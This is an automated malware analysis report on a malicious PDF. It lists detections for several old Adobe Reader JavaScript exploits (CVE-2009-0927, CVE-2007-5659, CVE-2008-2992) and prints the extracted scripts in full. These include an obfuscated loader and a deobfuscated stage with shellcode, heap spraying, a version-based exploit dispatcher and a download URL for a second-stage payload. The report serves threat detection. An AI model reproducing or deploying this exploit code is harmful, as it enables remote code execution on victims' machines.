Malicious PDF — malware analysis report

Static analysis result for SHA-256 214ca0faa1f75d9e…

MALICIOUS

PDF

11.3 KB Authoring application: Qepobohoviqa (via Uouonozl deqeendg) First seen: 2026-05-11
MD5: f3c1817a3ffe9d30b8f6b9eaadafa485 SHA-1: 343669933e5839cbade274a01d0ceea7f2a2d45d SHA-256: 214ca0faa1f75d9e94def753e2d31c8b2e492e1980d6822927da7b4f2d842ab8
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 JavaScript/JScript

The PDF contains embedded JavaScript, indicated by multiple heuristic firings and the presence of a JavaScript object. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript is likely intended to download and execute a second-stage payload, although the specific actions are not fully detailed due to obfuscation. The authoring application information is also suspicious.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://wearsarray.com/d/1.php?& Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0020_000.js pdf-javascript-stream PDF /JS object 20 at offset 0x26B4 3768 bytes
SHA-256: b8855ef209855034e4f065d2545023b5b9b4422c3e78de7a3d3e1a84032bbec8
Preview script
First 1,000 lines of the extracted script
var qD						=						[						"l"						,						"a"						,						"v"						,						"e"						,						""						];						h						=						new						 String						(						qD						[						3						]						+						qD						[						2						]						+						qD						[						1						]						+						qD						[						0						]						+						qD						[						4						]						)						;												var x						=						[						"Word"						,						"getPa"						,						"geNth"						,						""						];						xY						=						new						 String						(						x						[						1						]						+						x						[						2						]						+						x						[						0						]						+						x						[						3						]						)						;												var yR						=						[						"eNu"						,						"rds"						,						""						,						"get"						,						"Pag"						,						"mWo"						];						xW						=						new						 String						(						yR						[						3						]						+						yR						[						4						]						+						yR						[						0						]						+						yR						[						5						]						+						yR						[						1						]						+						yR						[						2						]						)						;												var uX						=						[						"s"						,						"e"						,						"n"						,						"u"						,						"p"						,						"e"						,						"a"						,						""						,						"c"						];						b						=						new						 String						(						uX						[						3						]						+						uX						[						2						]						+						uX						[						1						]						+						uX						[						0						]						+						uX						[						8						]						+						uX						[						6						]						+						uX						[						4						]						+						uX						[						1						]						+						uX						[						7						]						)						;												var t						=						[						"deA"						,						"cha"						,						"t"						,						"rCo"						,						""						];						f						=						new						 String						(						t						[						1						]						+						t						[						3						]						+						t						[						0						]						+						t						[						2						]						+						t						[						4						]						)						;												var tK						=						[						"harCo"						,						"fromC"						,						""						,						"de"						];						oR						=						new						 String						(						tK						[						1						]						+						tK						[						0						]						+						tK						[						3						]						+						tK						[						2						]						)						;												var v						=						[						"a"						,						""						,						"p"						,						"p"						];						l						=						new						 String						(						v						[						0						]						+						v						[						2						]						+						v						[						2						]						+						v						[						1						]						)						;																		var vY						=						this						;						var						 gB						=						new String("%")						;						var						 p						=						2						;						var						 bY						=						String						;						var						 mN						=						0						;						var						 lG						=						219						;						var						 l						=						vY						[						l						]						;						var						 uZ						=						3						;						var						 lO						=						vY						[						b						]						;						var						 mD						=						vY						[						xW						]						(						uZ						)						;						var						 r						=						""						;												for						(						var						 tA						=						mN						;						tA						<						mD						;						tA						+=						1						)						{												aV=vY						[						xY						]						(						uZ						,						tA						)						;						var						 rA						=						aV						.						substr						(						aV						.						length						-						p						,						p						)						;						var						 mZ						=						lO						(						gB						+						rA						)						;						var						 pY						=						mZ						[						f						]						(						mN						)						;						var						 kN						=						pY						^						lG						;						r						+=						bY						[						oR						]						(						kN						)						;						}						this						[						h						]						(						r						)						;
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3751 bytes
SHA-256: 95eb3a026415d963f3f05fa0e149ed61b84d648b7ed4830f73b4ec3bf8dfec9f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://wearsarray.com/d/1.php?&  */
var _u="http://wearsarray.com/d/1.php?& ";
  v         v  wuww6666 w$  
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U";

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);

	return ret;
};


function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
};

function sRLZYf(GLxg,THaby){while(GLxg.length*2 < THaby){GLxg+=GLxg;}GLxg=GLxg.substring(0,THaby/2);return GLxg;}function jnr(){var KdRvw=get_shellcode("CollabUTIL");

var YaM=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var VuyYV=YaM+KdRvw;var nYhg=unescape("%u0A0A%u0A0A");var UEXZT=20;var EdaVEk=UEXZT+VuyYV.length;while(nYhg.length < EdaVEk){nYhg+=nYhg;}var QLq=nYhg.substring(0,EdaVEk);var cNKsm=nYhg.substring(0,nYhg.length-EdaVEk);while(cNKsm.length+EdaVEk<0x40000){cNKsm=cNKsm+cNKsm+QLq;}var LPmEhRU=new Array();for(var i=0;i<1400;i++){LPmEhRU[i]=cNKsm+VuyYV;}var yLWdSkq=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",yLWdSkq);}
function ZmRpQ(){var tLTsV=get_shellcode("CollabEMAIL");
var LPmEhRU=new Array();var FNeZZn=0x0c0c0c0c;var MaLjNA=0x400000;var tcwXwm=tLTsV.length*2;var THaby=MaLjNA-(tcwXwm+0x38);var GLxg=unescape("%u9090%u9090");GLxg=sRLZYf(GLxg,THaby);var xEB=(FNeZZn-0x400000)/MaLjNA;for(var NcGEjzZ=0;NcGEjzZ < xEB;NcGEjzZ++){LPmEhRU[NcGEjzZ]=GLxg+tLTsV;}var dcv=unescape("%u0c0c%u0c0c");while(dcv.length<44952){dcv+=dcv;}this.collabStore=Collab.collectEmailInfo({subj:"",msg:dcv});}function wcc(){if(app.doc.Collab.getIcon){var pfGH=new Array();
var Yutw=get_shellcode("CollabICON");
var Jkw=Yutw.length*2;var THaby=0x400000-(Jkw+0x38);var GLxg=unescape("%u9090%u9090");
GLxg=sRLZYf(GLxg,THaby);var QhcpRBAy=(0x0c0c0c0c-0x400000)/0x400000;
for(var VUrd=0;VUrd < QhcpRBAy;VUrd++){pfGH[VUrd]=GLxg+Yutw;}var FrhvTVk=unescape("%09");while(FrhvTVk.length<0x4000){FrhvTVk+=FrhvTVk;}FrhvTVk="N."+FrhvTVk;app.doc.Collab.getIcon(FrhvTVk);}}function RUCXp(){var ZttFWtXh=app.viewerVersion.toString();ZttFWtXh=ZttFWtXh.replace(/\D/g,'');var gWehQ=new Array(ZttFWtXh.charAt(0),ZttFWtXh.charAt(1),ZttFWtXh.charAt(2));if((gWehQ[0]==8)&&(gWehQ[1]==0)||(gWehQ[1]==1&&gWehQ[2]<3)){jnr();}if((gWehQ[0]<8)||(gWehQ[0]==8&&gWehQ[1]<2&&gWehQ[2]<2)){ZmRpQ();}if((gWehQ[0]<9)||(gWehQ[0]==9&&gWehQ[1]<1)){wcc();}}

RUCXp();6w6ww5u ww      ` 5``  5    5       `  5     5      6  6 56    6565 6  w    6�� ��� ��

Open this report in the interactive analyzer, or submit your own file for analysis.